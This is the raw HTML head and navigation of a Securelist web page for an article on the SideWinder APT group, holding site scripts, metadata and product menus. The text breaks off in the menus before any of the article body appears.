CINXE.COM
SideWinder APT’s post-exploitation framework analysis | Securelist
<!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html;charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <script type="text/javascript"> /* <![CDATA[ */ var gform;gform||(document.addEventListener("gform_main_scripts_loaded",function(){gform.scriptsLoaded=!0}),window.addEventListener("DOMContentLoaded",function(){gform.domLoaded=!0}),gform={domLoaded:!1,scriptsLoaded:!1,initializeOnLoaded:function(o){gform.domLoaded&&gform.scriptsLoaded?o():!gform.domLoaded&&gform.scriptsLoaded?window.addEventListener("DOMContentLoaded",o):document.addEventListener("gform_main_scripts_loaded",o)},hooks:{action:{},filter:{}},addAction:function(o,n,r,t){gform.addHook("action",o,n,r,t)},addFilter:function(o,n,r,t){gform.addHook("filter",o,n,r,t)},doAction:function(o){gform.doHook("action",o,arguments)},applyFilters:function(o){return gform.doHook("filter",o,arguments)},removeAction:function(o,n){gform.removeHook("action",o,n)},removeFilter:function(o,n,r){gform.removeHook("filter",o,n,r)},addHook:function(o,n,r,t,i){null==gform.hooks[o][n]&&(gform.hooks[o][n]=[]);var e=gform.hooks[o][n];null==i&&(i=n+"_"+e.length),gform.hooks[o][n].push({tag:i,callable:r,priority:t=null==t?10:t})},doHook:function(n,o,r){var t;if(r=Array.prototype.slice.call(r,1),null!=gform.hooks[n][o]&&((o=gform.hooks[n][o]).sort(function(o,n){return o.priority-n.priority}),o.forEach(function(o){"function"!=typeof(t=o.callable)&&(t=window[t]),"action"==n?t.apply(null,r):r[0]=t.apply(null,r)})),"filter"==n)return r[0]},removeHook:function(o,n,t,i){var r;null!=gform.hooks[o][n]&&(r=(r=gform.hooks[o][n]).filter(function(o,n,r){return!!(null!=i&&i!=o.tag||null!=t&&t!=o.priority)}),gform.hooks[o][n]=r)}}); /* ]]> */ </script> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="pingback" href="https://securelist.com/xmlrpc.php" /> <link rel="apple-touch-icon" sizes="192x192" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-192x192.png"> <link rel="icon" type="image/png" sizes="192x192" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-192x192.png"> <link rel="icon" type="image/png" sizes="96x96" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-96x96.png"> <link rel="icon" type="image/png" sizes="48x48" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-48x48.png"> <link rel="icon" type="image/png" sizes="32x32" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-32x32.png"> <link rel="icon" type="image/png" sizes="16x16" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-16x16.png"> <link rel="manifest" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/site.webmanifest"> <title>SideWinder APT’s post-exploitation framework analysis | Securelist</title> <!-- The SEO Framework by Sybre Waaijer --> <meta name="keywords" content="APT,Backdoor,Malware,Malware Descriptions,Malware Technologies,SideWinder,Targeted attacks,Trojan" /> <link rel="canonical" href="https://securelist.com/sidewinder-apt/114089/" /> <meta name="description" content="Kaspersky analyzes SideWinder APT’s recent activity: new targets in the MiddleEast and Africa, post-exploitation tools and techniques." /> <meta property="og:type" content="article" /> <meta property="og:title" content="SideWinder APT’s post-exploitation framework analysis" /> <meta property="og:description" content="Kaspersky analyzes SideWinder APT’s recent activity: new targets in the MiddleEast and Africa, post-exploitation tools and techniques." /> <meta property="og:url" content="https://securelist.com/sidewinder-apt/114089/" /> <meta property="og:image" content="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/11172712/SL-SideWinder-StealerBot-featured.jpg" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:site" content="@Securelist" /> <meta name="twitter:creator" content="@Securelist" /> <meta name="twitter:title" content="SideWinder APT’s post-exploitation framework analysis" /> <meta name="twitter:description" content="Kaspersky analyzes SideWinder APT’s recent activity: new targets in the MiddleEast and Africa, post-exploitation tools and techniques." /> <meta name="twitter:image" content="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/11172712/SL-SideWinder-StealerBot-featured.jpg" /> <script type="application/ld+json">{"@context":"https://schema.org","@type":"NewsArticle","mainEntityOfPage":{"@type":"WebPage","@id":"https://securelist.com/sidewinder-apt/114089/"},"headline":"Beyond the Surface: the evolution and expansion of the SideWinder APT group","image":"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/11172712/SL-SideWinder-StealerBot-featured.jpg","datePublished":"2024-10-15T10:00:54+00:00","dateModified":"2024-10-18T11:18:34+00:00","author":{"@type":"Person","name":"Giampaolo Dedola","url":"https://securelist.com/author/giampaolodedola/"},"publisher":{"@type":"Organization","name":"Kaspersky","logo":{"@type":"ImageObject","url":"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/06/04065705/article-logo-small_new.png","width":60,"height":60}},"description":"Kaspersky analyzes SideWinder APT’s recent activity: new targets in the MiddleEast and Africa, post\u0026#x2d;exploitation tools and techniques."}</script> <!-- / The SEO Framework by Sybre Waaijer | 101.71ms meta | 0.22ms boot --> <link rel='dns-prefetch' href='//kasperskycontenthub.com' /> <link rel='dns-prefetch' href='//securelist.com' /> <link rel='dns-prefetch' href='//www.google.com' /> <link rel='dns-prefetch' href='//media.kaspersky.com' /> <link rel="alternate" type="application/rss+xml" title="Securelist - English - Global - securelist.com » Feed" href="https://securelist.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Securelist - English - Global - securelist.com » Comments Feed" href="https://securelist.com/comments/feed/" /> <link rel="alternate" type="application/rss+xml" title="Securelist - English - Global - securelist.com » Beyond the Surface: the evolution and expansion of the SideWinder APT group Comments Feed" href="https://securelist.com/sidewinder-apt/114089/feed/" /> <link rel='stylesheet' id='crayon-group-css' href='//assets.kasperskycontenthub.com/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/crayon-syntax-highlighter/css/min/crayon.min.css,wp-content/plugins/crayon-syntax-highlighter/themes/classic/classic.css,wp-content/plugins/crayon-syntax-highlighter/fonts/monaco.css,wp-includes/css/dist/block-library/style.min.css,wp-content/plugins/jquery-collapse-o-matic/css/core_style.css,wp-content/plugins/jquery-collapse-o-matic/css/light_style.css,wp-content/plugins/kspr_twitter_pullquote/css/style.css,wp-content/themes/securelist2020/assets/css/main.css,wp-content/plugins/kaspersky-social-sharing/assets/css/style.css,wp-content/plugins/kaspersky-social-sharing/assets/css/custom.css' type='text/css' media='all' /> <link rel='stylesheet' id='taxonomy-image-plugin-public-group-css' href='//assets.kasperskycontenthub.com/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/taxonomy-images/css/style.css' type='text/css' media='screen' /> <script type="text/javascript" src="https://securelist.com/wp-content/plugins/kaspersky-enable-jquery-migrate-helper/js/jquery/jquery-1.12.4-wp.js?ver=1.12.4-wp" id="jquery-core-js"></script> <script type="text/javascript" id="kaspersky-sso-integration-js-extra"> /* <![CDATA[ */ var kasperskySSOIntegrationData = {"authorizationURL":"https:\/\/auth.ca.uis.kaspersky.com\/connect\/authorize?client_id=securelist&client_name=Securelist&redirect_uri=https%3A%2F%2Fsecurelist.com%2Fkaspersky-sso%2Flogin%2F&response_type=code&scope=openid email profile offline_access","endSessionURL":"https:\/\/auth.ca.uis.kaspersky.com\/connect\/endsession?id_token_hint=eyJhbGciOiJSUzI1NiIsImtpZCI6IkNCNzFGQTExMjc4MzgyMzQ3OTAxNzlENkJGMkVBNkFCRkZGOEQ5OUYiLCJ4NXQiOiJ5M0g2RVNlRGdqUjVBWG5Xdnk2bXFfXzQyWjgiLCJ0eXAiOiJKV1QifQ.eyJhdF9oYXNoIjoiZDZVNFRvSi1MamJMdVlpR3VRNHFOQSIsInNpZCI6ImNrblhXczF5UFotYVVmRmJWQUZzN0EiLCJzdWIiOiIwMmU0MWE1My03MmY1LTQyNmYtYTUxNS1hMzFjZjc3NjZjODEiLCJhdXRoX3RpbWUiOiIxNzMyNTIyNjE2IiwiaWRwIjoiS2FzcGVyc2t5SWQiLCJrYXNwZXJza3kuc3ViX3ZlcnNpb24iOiIxIiwia2FzcGVyc2t5LnN1c3BpY2lvdXNfYXV0aGVudGljYXRpb24iOiJmYWxzZSIsIm5iZiI6MTczMjUyMjYxOSwiZXhwIjoxNzMyNjA5MDE5LCJpYXQiOjE3MzI1MjI2MTksImlzcyI6Imh0dHBzOi8vYXV0aC5jYS51aXMua2FzcGVyc2t5LmNvbSIsImF1ZCI6InNlY3VyZWxpc3QifQ.OguUvee3qrjOD6Dd5MSQFF3NfOlluXFgG5RYs3v287UUNcgvJChXtDsi0F5YA_VdzXCHz4PpZ4z9nQmK7YLleUEAFDYa1fPkE2gzooA3B8GPp66rVQBr8OFh5HpLkVOhFPk1QFGYe6igJ_7SS5CeVLci8QL6W4G6WdihuSNv9A8xhq0w5zzDT17cVJZvp_eFxoV7LYc5rHgx6MKw--NbK45pH0868zh1C_nivtFsWDGy61pk3DMBiyApBtjNAYMa409CDPKQHm6LknLVeMdedGDE64jbAXb0lD94TcHQzaSiO4QP0Vm6OWOKk1bXR21onCMoD5XrqJAaRtPtu-Yb0A&post_logout_redirect_uri=https:\/\/securelist.com\/kaspersky-sso\/logout\/"}; /* ]]> */ </script> <script type="text/javascript" id="kss_js-js-extra"> /* <![CDATA[ */ var kss = {"twitter_account":"Securelist"}; /* ]]> */ </script> <script type='text/javascript' src='//assets.kasperskycontenthub.com/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/kaspersky-lazy-load/assets/js/lazyload.js,wp-content/plugins/kaspersky-sso-integration/assets/js/main.js,wp-content/plugins/kspr_twitter_pullquote/js/kaspersky-twitter-pullquote.js,wp-content/plugins/kaspersky-social-sharing/assets/js/social-share.js'></script> <link rel="alternate" hreflang="x-default" href="https://securelist.com/sidewinder-apt/114089/" /> <script> window.dataLayer = window.dataLayer || []; window.dataLayer.push({ 'Author' : 'Giampaolo Dedola', 'PostId' : '114089', 'PublicationDate' : '2024-10-15', 'Categories': 'APT reports', 'Tags': 'APT, Backdoor, Malware, Malware Descriptions, Malware Technologies, SideWinder, Targeted attacks, Trojan', }); </script> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-5CGZ3HG');</script> <!-- End Google Tag Manager --> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-WZ7LJ3');</script> <!-- End Google Tag Manager --> <link rel="https://api.w.org/" href="https://securelist.com/wp-json/" /><link rel="alternate" type="application/json" href="https://securelist.com/wp-json/wp/v2/posts/114089" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://securelist.com/xmlrpc.php?rsd" /> <link rel="alternate" type="application/json+oembed" href="https://securelist.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsecurelist.com%2Fsidewinder-apt%2F114089%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://securelist.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsecurelist.com%2Fsidewinder-apt%2F114089%2F&format=xml" /> <script type="text/javascript"> var sNew = document.createElement("script"); sNew.async = true; sNew.src = "https://kasperskycontenthub.com/?dm=ed1f9e435dc885292eab65620c51f3fb&action=load&blogid=43&siteid=1&t=1849899041&back=https%3A%2F%2Fsecurelist.com%2Fsidewinder-apt%2F114089%2F" var s0 = document.getElementsByTagName('script')[0]; s0.parentNode.insertBefore(sNew, s0); </script> <script type="text/javascript"> document.write(unescape("%3Cscript src='//munchkin.marketo.net/munchkin.js' type='text/javascript'%3E%3C/script%3E")); </script> <script>Munchkin.init('802-IJN-240');</script> <meta name="google-site-verification" content="o48MojucKcP-DT5iCMR8AsvkVWP14fE78flHCqqjo50" /> <script type="text/javascript"> var jQueryMigrateHelperHasSentDowngrade = false; window.onerror = function( msg, url, line, col, error ) { // Break out early, do not processing if a downgrade reqeust was already sent. if ( jQueryMigrateHelperHasSentDowngrade ) { return true; } var xhr = new XMLHttpRequest(); var nonce = '4ed5b6ce96'; var jQueryFunctions = [ 'andSelf', 'browser', 'live', 'boxModel', 'support.boxModel', 'size', 'swap', 'clean', 'sub', ]; var match_pattern = /\)\.(.+?) is not a function/; var erroredFunction = msg.match( match_pattern ); // If there was no matching functions, do not try to downgrade. if ( typeof erroredFunction !== 'object' || typeof erroredFunction[1] === "undefined" || -1 === jQueryFunctions.indexOf( erroredFunction[1] ) ) { return true; } // Set that we've now attempted a downgrade request. jQueryMigrateHelperHasSentDowngrade = true; xhr.open( 'POST', 'https://securelist.com/wp-admin/admin-ajax.php' ); xhr.setRequestHeader( 'Content-Type', 'application/x-www-form-urlencoded' ); xhr.onload = function () { var response, reload = false; if ( 200 === xhr.status ) { try { response = JSON.parse( xhr.response ); reload = response.data.reload; } catch ( e ) { reload = false; } } // Automatically reload the page if a deprecation caused an automatic downgrade, ensure visitors get the best possible experience. if ( reload ) { location.reload(); } }; xhr.send( encodeURI( 'action=jquery-migrate-downgrade-version&_wpnonce=' + nonce ) ); // Suppress error alerts in older browsers return true; } </script> <div id="fb-root"></div> <script> (function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_US/all.js#xfbml=1&appId=160639043985664"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk')); </script> <script> (function() { var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true; po.src = '//apis.google.com/js/platform.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s); })(); </script> <link rel="icon" href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06125514/cropped-sl_favicon-32x32.png" sizes="32x32" /> <link rel="icon" href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06125514/cropped-sl_favicon-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon" href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06125514/cropped-sl_favicon-180x180.png" /> <meta name="msapplication-TileImage" content="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06125514/cropped-sl_favicon-270x270.png" /> </head> <body class="post-template-default single single-post postid-114089 single-format-standard lang-en_US c-theme--light"> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-5CGZ3HG" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-WZ7LJ3" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --> <div id="site-top" class="site-top"> <div class="container"> <nav class="site-nav" data-element-id="product-menu"> <div class="label"> <p>Solutions for:</p> </div> <ul id="menu-product-menu-daily-nxgen" class="site-selector"><li><a target="_blank" href="https://www.kaspersky.com/home-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_prodmen_sm-team_______d5c53f9a5bd411f7" data-element-id="product-menu-link" class="font-icons icon-home menu-item menu-item-type-custom menu-item-object-custom menu-item-87907">Home Products</a></li> <li><a title="font-icons icon-small-business" target="_blank" href="https://www.kaspersky.com/small-business-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_prodmen_sm-team_______d5c53f9a5bd411f7" data-element-id="product-menu-link" class="font-icons icon-small-business menu-item menu-item-type-custom menu-item-object-custom menu-item-87908">Small Business 1-50 employees</a></li> <li><a target="_blank" href="https://www.kaspersky.com/small-to-medium-business-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_prodmen_sm-team_______d5c53f9a5bd411f7" data-element-id="product-menu-link" class="font-icons icon-medium-business menu-item menu-item-type-custom menu-item-object-custom menu-item-87909">Medium Business 51-999 employees</a></li> <li><a target="_blank" href="https://www.kaspersky.com/enterprise-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_prodmen_sm-team_______d5c53f9a5bd411f7" data-element-id="product-menu-link" class="font-icons icon-enterprise menu-item menu-item-type-custom menu-item-object-custom menu-item-87910">Enterprise 1000+ employees</a></li> </ul> </nav> </div> </div> <header id="site-header" class="site-header js-sticky-mobile-header"> <div class="container"> <a href="" class="c-page-nav-toggle js-mobile-menu-toggle"> <span class="c-page-nav-toggle__icon"> <span></span> <span></span> <span></span> </span> </a> <a href="" class="menu-toggle"> <span></span> <span></span> <span></span> </a> <div class="c-site-title"> <div class="c-site-logo__group"> <a data-element-id="securelist-logo" href="https://securelist.com/" class="c-site-logo c-site-logo--basic"></a> <span class="c-site-tagline">by Kaspersky</span> </div> </div> <ul id="menu-my-kaspersky" class="menu-utility sticky-utility"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87905"><a href="https://companyaccount.kaspersky.com/account/login?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="companyaccount">CompanyAccount</a> <li class="sticky-item sticky-xl-only menu-item menu-item-type-custom menu-item-object-custom menu-item-87906"><a href="https://www.kaspersky.com/enterprise-security/contact?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="getintouch">Get In Touch</a> <li class="securelist-theme-switcher menu-item menu-item-type-custom menu-item-object-custom menu-item-99824"><a data-element-id="dark-mode" href="#" class="js-theme-switcher"><i class="font-icons icon-moon"></i>Dark mode<span class="u-hidden u-inline--dark"> off</span></a> <li class="dropdown"><a data-element-id="lang-selector" href="#" class="">English</a><ul class="sub-menu-regular"><li><a href="https://securelist.ru">Russian</a></li><li><a href="https://securelist.lat">Spanish</a></li></ul> </ul> <div class="c-page-search js-main-search"> <form class="c-page-search__form c-page-search__form--small js-wizardinfosys_autosearch_form" full_search_url="https://securelist.com/?s=%q%" action="https://securelist.com/" method="get"> <div class="c-form-element c-form-element--style-fill"> <div class="c-form-element__field wp_autosearch_form_wrapper"> <input name="s" class="c-form-element__text wp_autosearch_input ac_input" data-webinars="" type="text" value="" placeholder="Search..." autocomplete="off"> </div> </div> <button class="c-button c-button--icon wp_autosearch_submit"><svg class="o-icon o-svg-icon o-svg-large"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-search"></use></svg></button> </form> <div class="c-page-search__toggle js-main-search-toggle"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-search"></use></svg></div> </div> <nav class="main-nav" data-element-id="nextgen-menu"> <ul id="menu-corp-menu" class="main-menu"><li class="dropdown mega menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87706"><a href="https://www.kaspersky.com/enterprise-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Solutions</a> <ul class="submenu"> <li class="first featured featured-smaller menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87707"> <ul class="featured section-col-l-3 no-gutter"> <li class="show-figure smaller-item icon-iot-embed-security menu-item menu-item-type-custom menu-item-object-custom menu-item-87710"><figure><a href="https://www.kaspersky.com/enterprise-security/embedded-security-internet-of-things?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/iot-embed-security.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/embedded-security-internet-of-things?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Internet of Things & Embedded Security</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/embedded-security-internet-of-things?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-transportation-cybersecurity menu-item menu-item-type-custom menu-item-object-custom menu-item-87712"><figure><a href="https://www.kaspersky.com/enterprise-security/industrial-solution?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/transportation-cybersecurity.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/industrial-solution?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Industrial Cybersecurity</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/industrial-solution?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-fraud-prevention menu-item menu-item-type-custom menu-item-object-custom menu-item-87713"><figure><a href="https://www.kaspersky.com/enterprise-security/fraud-prevention?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/fraud-prevention.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/fraud-prevention?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Fraud Prevention</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/fraud-prevention?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item menu-item menu-item-type-custom menu-item-object-custom menu-item-87711"><a href="https://www.kaspersky.com/enterprise-security/kasperskyos?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">KasperskyOS-based solutions</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/kasperskyos?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> </ul> <li> <ul class="regular"> <li class="title"><h6>Other solutions</h6> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105615"><a href="https://www.kaspersky.com/enterprise-security/security-operations-center-soc?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky for Security Operations Center</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105614"><a href="https://www.kaspersky.com/enterprise-security/kaspersky-iot-infrastructure-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky IoT Infrastructure Security</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112322"><a href="https://www.kaspersky.com/enterprise-security/kaspersky-secure-remote-workspace?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Secure Remote Workspace</a> </ul> </ul> <li class="dropdown mega menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87714"><a href="https://www.kaspersky.com/enterprise-security/industries?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Industries</a> <ul class="submenu"> <li class="first featured featured-smaller menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87715"> <ul class="featured section-col-l-3 no-gutter"> <li class="show-figure smaller-item icon-national-cybersecurity menu-item menu-item-type-custom menu-item-object-custom menu-item-87716"><figure><a href="https://www.kaspersky.com/enterprise-security/national-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/national-cybersecurity.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/national-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">National Cybersecurity</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/national-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-industrial-cybersecurity menu-item menu-item-type-custom menu-item-object-custom menu-item-87717"><figure><a href="https://www.kaspersky.com/enterprise-security/industrial?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/industrial-cybersecurity.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/industrial?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Industrial Cybersecurity</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/industrial?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-financial-cybersecurity menu-item menu-item-type-custom menu-item-object-custom menu-item-87718"><figure><a href="https://www.kaspersky.com/enterprise-security/finance?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/financial-cybersecurity.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/finance?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Finance Services Cybersecurity</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/finance?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-healthcare-cybersecurity menu-item menu-item-type-custom menu-item-object-custom menu-item-87719"><figure><a href="https://www.kaspersky.com/enterprise-security/healthcare?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/healthcare-cybersecurity.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/healthcare?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Healthcare Cybersecurity</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/healthcare?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-transportation-cybersecurity menu-item menu-item-type-custom menu-item-object-custom menu-item-87720"><figure><a href="https://www.kaspersky.com/enterprise-security/transportation-cybersecurity-it-infrastructure?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/transportation-cybersecurity.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/transportation-cybersecurity-it-infrastructure?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Transportation Cybersecurity</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/transportation-cybersecurity-it-infrastructure?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-retail-cybersecurity menu-item menu-item-type-custom menu-item-object-custom menu-item-87721"><figure><a href="https://www.kaspersky.com/enterprise-security/retail-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/retail-cybersecurity.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/retail-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Retail Cybersecurity</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/retail-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> </ul> <li> <ul class="regular"> <li class="title"><h6>Other Industries</h6> <li 